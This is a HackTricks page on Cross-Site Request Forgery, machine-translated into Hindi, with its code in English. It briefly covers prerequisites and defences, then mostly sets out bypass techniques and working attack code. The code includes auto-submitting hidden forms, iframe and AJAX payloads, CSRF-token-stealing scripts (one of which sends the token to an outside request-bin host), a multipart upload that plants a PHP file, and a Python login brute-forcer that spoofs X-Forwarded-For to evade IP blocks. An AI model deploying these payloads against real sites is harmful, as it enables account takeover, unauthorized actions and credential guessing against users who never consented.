CSRF (Cross Site Request Forgery)

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

अगर आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
हमारे साथ जुड़ें 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें ट्विटर 🐦 @carlospolopm पर फॉलो करें।
अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।

HackenProof Discord सर्वर में शामिल होकर अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!

हैकिंग इंसाइट्स उस सामग्री के साथ जुड़ें जो हैकिंग के रोमांच और चुनौतियों में डूबती है

रियल-टाइम हैक समाचार तेजी से बदलती हैकिंग दुनिया के साथ अप-टू-डेट रहें न्यूज़ और इंसाइट्स के माध्यम से

नवीनतम घोषणाएं नवीनतम बग बाउंटी लॉन्च और महत्वपूर्ण प्लेटफॉर्म अपडेट के साथ जागरूक रहें

हमारे साथ जुड़ें Discord और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!

Cross-Site Request Forgery (CSRF) का विवरण

Cross-Site Request Forgery (CSRF) एक प्रकार की सुरक्षा दोष है जो वेब एप्लिकेशनों में पाया जाता है। यह आक्रमण करने वाले को अनजान उपयोगकर्ताओं के नाम पर क्रियाएँ करने की संभावना देता है जिनके प्रमाणीकृत सत्र का शोषण किया जाता है। यह हमला तब किया जाता है जब एक उपयोगकर्ता, जो एक पीड़ित के प्लेटफ़ॉर्म में लॉग इन है, एक दुर्भाग्यपूर्ण साइट पर जाता है। इस साइट ने फिर पीड़ित के खाते के लिए अनुरोधों को ट्रिगर किया है जैसे कि जावास्क्रिप्ट को क्रियान्वित करना, फॉर्म सबमिट करना, या छवियों को लाना।

CSRF हमले के लिए पूर्वापेक्षाएँ

CSRF दोष का शोधन करने के लिए कई शर्तों को पूरा किया जाना चाहिए:

मूल्यवान क्रिया की पहचान: हमलावादी को एक क्रिया की पहचान करनी चाहिए जैसे कि उपयोगकर्ता का पासवर्ड बदलना, ईमेल बदलना, या प्रिविलेज उच्चाधिकारित करना।
सत्र प्रबंधन: उपयोगकर्ता का सत्र केवल कुकीज़ या HTTP बेसिक प्रमाणीकरण हेडर के माध्यम से प्रबंधित होना चाहिए, क्योंकि इस उद्देश्य के लिए अन्य हेडर में खेल नहीं सकता।
अपूर्वाकालिक पैरामीटरों की अभाव: अनियंत्रित पैरामीटरों को शामिल नहीं किया जाना चाहिए, क्योंकि वे हमले को रोक सकते हैं।

त्वरित जांच

आप Burp में अनुरोध को कैप्चर कर सकते हैं और CSRF सुरक्षा की जांच करने के लिए ब्राउज़र से टेस्ट करने के लिए आप Copy as fetch पर क्लिक कर सकते हैं और अनुरोध की जांच कर सकते हैं:

CSRF के खिलाफ बचाव

कई उपाय किए जा सकते हैं जो CSRF हमलों के खिलाफ सुरक्षा प्रदान करने के लिए लागू किए जा सकते हैं:

SameSite कुकीज़: यह गुण ब्राउज़र को क्रॉस-साइट अनुरोधों के साथ कुकीज़ भेजने से रोकता है। SameSite कुकीज़ के बारे में अधिक जानकारी।
क्रॉस-उत्सर्जन संसाधन साझाकरण: पीड़ित साइट की CORS नीति हमले की संभावना पर प्रभाव डाल सकती है, खासकर अगर हमला पीड़ित साइट से प्रतिक्रिया पढ़ने की आवश्यकता है। CORS बायपास के बारे में जानें।
उपयोगकर्ता सत्यापन: उपयोगकर्ता के पासवर्ड पूछना या कैप्चा हल करना उपयोगकर्ता की इच्छा की पुष्टि कर सकता है।
रेफरर या उत्पत्ति हेडर्स की जांच: इन हेडर्स की मान्यता सत्यापित करने से अनुरोध आवश्यक स्रोतों से आ रहे हैं यह सुनिश्चित करने में मदद कर सकती है। हालांकि, URL का सावधानीपूर्वक तैयार किया जा सकता है जैसे:
http://mal.net?orig=http://example.com (URL विश्वसनीय URL के साथ समाप्त होता है)
http://example.com.mal.net (URL विश्वसनीय URL के साथ शुरू होता है)
पैरामीटर नामों को संशोधित करना: POST या GET अनुरोधों में पैरामीटरों के नामों को बदलना स्वचालित हमलों को रोकने में मदद कर सकता है।
CSRF टोकन: प्रत्येक सत्र में एक अद्वितीय CSRF टोकन शामिल करना और इस टोकन की आवश्यकता होने पर उसे उपयोग में लाने से CSRF का जोखिम काफी कम हो सकता है। टोकन की प्रभावकारिता को CORS के प्रयोग से बढ़ाया जा सकता है।

इन रक्षाओं को समझना और लागू करना वेब एप्लिकेशनों की सुरक्षा और पूर्णता बनाए रखने के लिए महत्वपूर्ण है।

रक्षाओं को उलटने

POST से GET तक

शायद वह फॉर्म जिसे आप दुरुपयोग करना चाहते हैं, एक CSRF टोकन के साथ POST अनुरोध भेजने के लिए तैयार है लेकिन, आपको जांच करनी चाहिए कि क्या एक GET भी मान्य है और यदि जब आप एक GET अनुरोध भेजते हैं तो CSRF टोकन अब भी मान्य है या नहीं।

टोकन की कमी

एप्लिकेशनें शायद टोकनों की मान्यता सत्यापित करने के लिए एक तंत्र को लागू कर सकती हैं जब वे मौजूद होते हैं। हालांकि, एक सुरक्षा दोष उत्पन्न होता है अगर टोकन अनुपस्थित होने पर सत्यापन को पूरी तरह से छोड़ दिया जाता है। हमलावादी इसे उपयोग करके इस सत्यापन प्रक्रिया को टाल सकत

<html>
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
<input type="submit" value="Submit request" />
</form>
<img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body>
</html>

ध्यान दें कि यदि csrf टोकन सत्र कुकी से संबंधित है तो यह हमला काम नहीं करेगा क्योंकि आपको पीड़ित को अपना सत्र सेट करने की आवश्यकता होगी, और इसलिए आप खुद पर हमला कर रहे होंगे।

Content-Type बदलें

इस के अनुसार प्रीफ्लाइट अनुरोधों से बचने के लिए POST विधि का उपयोग करते समय ये स्वीकृत Content-Type मान हैं:

application/x-www-form-urlencoded
multipart/form-data
text/plain

हालांकि, ध्यान दें कि सर्वर का तर्क भिन्न हो सकता है जिस पर Content-Type का उपयोग किया जाता है, इसलिए आपको उल्लिखित मानों की कोशिश करनी चाहिए और अन्य जैसे application/json,text/xml, application/xml.

उदाहरण (यहाँ से लिया गया है) JSON डेटा को text/plain के रूप में भेजने का:

<html>
<body>
<form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
</form>
<script>
form.submit();
</script>
</body>
</html>

JSON डेटा के लिए प्रीफ्लाइट अनुरोधों को बाइपास करना

JSON डेटा को POST अनुरोध के माध्यम से भेजने का प्रयास करते समय, HTML फॉर्म में Content-Type: application/json का उपयोग सीधे रूप से संभव नहीं है। उसी तरह, इस सामग्री प्रकार को भेजने के लिए XMLHttpRequest का उपयोग करने पर एक प्रीफ्लाइट अनुरोध प्रारंभ होता है। फिर भी, इस सीमा को अनदेखा करने और जांचने के लिए कुछ रणनीतियाँ हो सकती हैं कि क्या सर्वर JSON डेटा को Content-Type के अपरिपक्व होने के बावजूद प्रसंस्करण करता है:

वैकल्पिक सामग्री प्रकार का उपयोग करें: फॉर्म में enctype="text/plain" सेट करके Content-Type: text/plain या Content-Type: application/x-www-form-urlencoded का उपयोग करें। यह दृष्टिकोण परीक्षण करता है कि पीछे की ओर का सर्वर Content-Type के बावजूद डेटा का उपयोग करता है या नहीं।
सामग्री प्रकार में परिवर्तन करें: प्रीफ्लाइट अनुरोध से बचने के लिए और सर्वर को सामग्री को JSON के रूप में मान्य करने की सुनिश्चित करने के लिए, आप Content-Type: text/plain; application/json के साथ डेटा भेज सकते हैं। यह एक प्रीफ्लाइट अनुरोध को ट्रिगर नहीं करता है लेकिन यदि सर्वर application/json स्वीकार करने के लिए कॉन्फ़िगर किया गया है तो सही ढंग से प्रसंस्कृत हो सकता है।
SWF फ्लैश फ़ाइल उपयोग: एक कम प्रचलित लेकिन संभावनाशील विधि शामिल है जिसमें ऐसी प्रतिबंधों को बाइपास करने के लिए SWF फ्लैश फ़ाइल का उपयोग किया जाता है। इस तकनीक की गहन समझ के लिए, इस पोस्ट का संदर्भ देखें।

रेफरर / मूल जांच बाइपास

रेफरर हेडर से बचें

एप्लिकेशन्स केवल तब 'Referer' हेडर को मान्य कर सकते हैं जब यह मौजूद हो। इस हेडर को भेजने से ब्राउज़र को रोकने के लिए, निम्नलिखित HTML मेटा टैग का उपयोग किया जा सकता है:

<meta name="referrer" content="never">

यह सुनिश्चित करता है कि 'Referer' हेडर छोड़ दिया जाता है, कुछ एप्लिकेशन में मान्यता की जांचों को छलने की संभावना है।

रेजेक्स छलना

pageURL Format Bypass

सर्वर के डोमेन नाम को URL में सेट करने के लिए जिस URL में Referrer पैरामीटर के भीतर भेजा जाएगा, आप यह कर सकते हैं:

<html>
<!-- Referrer policy needed to send the qury parameter in the referrer -->
<head><meta name="referrer" content="unsafe-url"></head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="submit" value="Submit request" />
</form>
<script>
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
document.forms[0].submit();
</script>
</body>
</html>

HEAD method bypass

पहला हिस्सा इस CTF व्रिटअप में व्याख्या की गई है कि Oak का सोर्स कोड, एक राउटर HEAD रिक्वेस्ट्स को GET रिक्वेस्ट्स के रूप में हैंडल करने के लिए सेट किया गया है जिसमें कोई प्रतिक्रिया बॉडी नहीं है - एक सामान्य उपाय जो Oak के लिए अद्वितीय नहीं है। HEAD रिक्वेस्ट्स के लिए एक विशिष्ट हैंडलर की बजाय, वे सिर्फ GET हैंडलर को देते हैं लेकिन ऐप बस प्रतिक्रिया बॉडी को हटा देता है।

इसलिए, अगर एक GET रिक्वेस्ट पर प्रतिबंध लगाया गया है, तो आप एक HEAD रिक्वेस्ट भेज सकते हैं जो एक GET रिक्वेस्ट के रूप में प्रसंस्कृत किया जाएगा।

शोषण उदाहरण

CSRF टोकन को बाहर निकालना

अगर एक CSRF टोकन का उपयोग रक्षा के रूप में हो रहा है तो आप एक XSS व्यक्तित्व या एक Dangling Markup व्यक्तित्व का दुरुपयोग करके इसे बाहर निकालने की कोशिश कर सकते हैं।

HTML टैग्स का उपयोग करके GET

<img src="http://google.es?param=VALUE" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available

अन्य HTML5 टैग जो स्वचालित रूप से GET अनुरोध भेजने के लिए उपयोग किए जा सकते हैं:

<iframe src="..."></iframe>
<script src="..."></script>
<img src="..." alt="">
<embed src="...">
<audio src="...">
<video src="...">
<source src="..." type="...">
<video poster="...">
<link rel="stylesheet" href="...">
<object data="...">
<body background="...">
<div style="background: url('...');"></div>
<style>
body { background: url('...'); }
</style>
<bgsound src="...">
<track src="..." kind="subtitles">
<input type="image" src="..." alt="Submit Button">

फॉर्म GET अनुरोध

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form method="GET" action="https://victim.net/email/change-email">
<input type="hidden" name="email" value="some@email.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

फॉर्म POST अनुरोध

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form method="POST" action="https://victim.net/email/change-email" id="csrfform">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
</form>
<script>
document.forms[0].submit(); //Way 3 to autosubmit
</script>
</body>
</html>

आईफ्रेम के माध्यम से फॉर्म पोस्ट अनुरोध

<!--
The request is sent through the iframe withuot reloading the page
-->
<html>
<body>
<iframe style="display:none" name="csrfframe"></iframe>
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

एजैक्स पोस्ट अनुरोध

<script>
var xh;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xh=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP");
}
xh.withCredentials = true;
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");
</script>

<script>
//JQuery version
$.ajax({
type: "POST",
url: "https://google.com",
data: "param=value&param2=value2"
})
</script>

multipart/form-data POST अनुरोध

myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"
});

multipart/form-data POST अनुरोध v2

// https://www.exploit-db.com/exploits/20009
var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true);
//  MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";

//xhr.send(body);
xhr.sendAsBinary(body);

आईफ्रेम के भीतर से फॉर्म पोस्ट अनुरोध

<--! expl.html -->

<body onload="envia()">
<form method="POST"id="formulario" action="http://aplicacion.example.com/cambia_pwd.php">
<input type="text" id="pwd" name="pwd" value="otra nueva">
</form>
<body>
<script>
function envia(){document.getElementById("formulario").submit();}
</script>

<!-- public.html -->
<iframe src="2-1.html" style="position:absolute;top:-5000">
</iframe>
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>

CSRF टोकन चुराएं और एक POST अनुरोध भेजें

function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;

// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
//console.log(xhr.responseText);
}
}

xhr.send("token=" + token + "&otherparama=heyyyy");
}

function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}

var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();

CSRF टोकन चुराएं और एक आईफ्रेम, एक फॉर्म और एजेक्स का उपयोग करके एक पोस्ट अनुरोध भेजें

<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
<input type="text" name="username" value="AA">
<input type="checkbox" name="status" checked="checked">
<input id="token" type="hidden" name="token" value="" />
</form>

<script type="text/javascript">
function f1(){
x1=document.getElementById("i1");
x1d=(x1.contentWindow||x1.contentDocument);
t=x1d.document.getElementById("token").value;

document.getElementById("token").value=t;
document.getElementById("form1").submit();
}
</script>
<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>

CSRF टोकन चुरा लें और एक आईफ्रेम और एक फॉर्म का उपयोग करके एक पोस्ट अनुरोध भेजें

<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>

<script>
function read()
{
var name = 'admin2';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('<form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php"  enctype="multipart/form-data">');
document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
document.writeln('</form>');
document.forms[0].submit.click();
}
</script>

टोकन चुराएं और इसे 2 आइफ्रेम का उपयोग करके भेजें

<script>
var token;
function readframe1(){
token = frame1.document.getElementById("profile").token.value;
document.getElementById("bypass").token.value = token
loadframe2();
}
function loadframe2(){
var test = document.getElementbyId("frame2");
test.src = "http://requestb.in/1g6asbg1?token="+token;
}
</script>

<iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>

<iframe id="frame2" name="frame2"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name"bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data">
<input type="text" name="username" value="z">
<input type="checkbox" name="status" checked="">
<input id="token" type="hidden" name="token" value="0000" />
<button type="submit">Submit</button>
</form>

Ajax के साथ CSRF टोकन चुराएं और एक फॉर्म के साथ एक पोस्ट भेजें

<body onload="getData()">

<form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="root"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="findtoken" name="token" value=""/>
<input type="submit" value="valider"/>
</form>

<script>
var x = new XMLHttpRequest();
function getData() {
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true);
x.send(null);
}
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("findtoken").value = token;
document.getElementById("form").submit();
}
}
</script>

Socket.IO के साथ CSRF

<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');

const username = 'admin'

socket.on('connect', () => {
console.log('connected!');
socket.emit('join', {
room: username
});
socket.emit('my_room_event', {
data: '!flag',
room: username
})

});
</script>

CSRF लॉगिन ब्रूट फोर्स

यह कोड एक CSRF टोकन का उपयोग करके लॉगिन फॉर्म को ब्रूट फोर्स करने के लिए उपयोग किया जा सकता है (यह भी X-Forwarded-For हेडर का उपयोग कर रहा है ताकि संभावित आईपी ब्लैकलिस्टिंग को बायपास करने का प्रयास कर सके):

import request
import re
import random

URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"

def init_session():
#Return CSRF + Session (cookie)
r = requests.get(URL)
csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
csrf = csrf.group(1)
session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
return csrf, session_cookie

def login(user, password):
print(f"{user}:{password}")
csrf, cookie = init_session()
cookies = {SESSION_COOKIE_NAME: cookie}
data = {
"tokenCSRF": csrf,
"username": user,
"password": password,
"save": ""
}
headers = {
"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
}
r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
if "Username or password incorrect" in r.text:
return False
else:
print(f"FOUND {user} : {password}")
return True

with open(PASS_LIST, "r") as f:
for line in f:
login(USER, line.strip())

उपकरण

संदर्भ

हैकिंग इंसाइट्स हैकिंग के रोमांच और चुनौतियों में डूबने वाली सामग्री के साथ जुड़ें

रियल-टाइम हैक न्यूज़ रियल-टाइम समाचार और अंतर्दृष्टि के माध्यम से तेजी से बदलती हैकिंग दुनिया में अपडेट रहें

नवीनतम घोषणाएं नवीनतम बग बाउंटी लॉन्च और महत्वपूर्ण प्लेटफॉर्म अपडेट के साथ अवगत रहें

हमारे साथ जुड़ें Discord और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs संग्रह, The PEASS Family, खोजें
शामिल हों 💬 Discord समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
HackTricks और HackTricks Cloud github repos में PR जमा करके अपने हैकिंग ट्रिक्स साझा करें।

PreviousCRLF (%0D%0A) Injection NextDangling Markup - HTML scriptless injection

Last updated 10 hours ago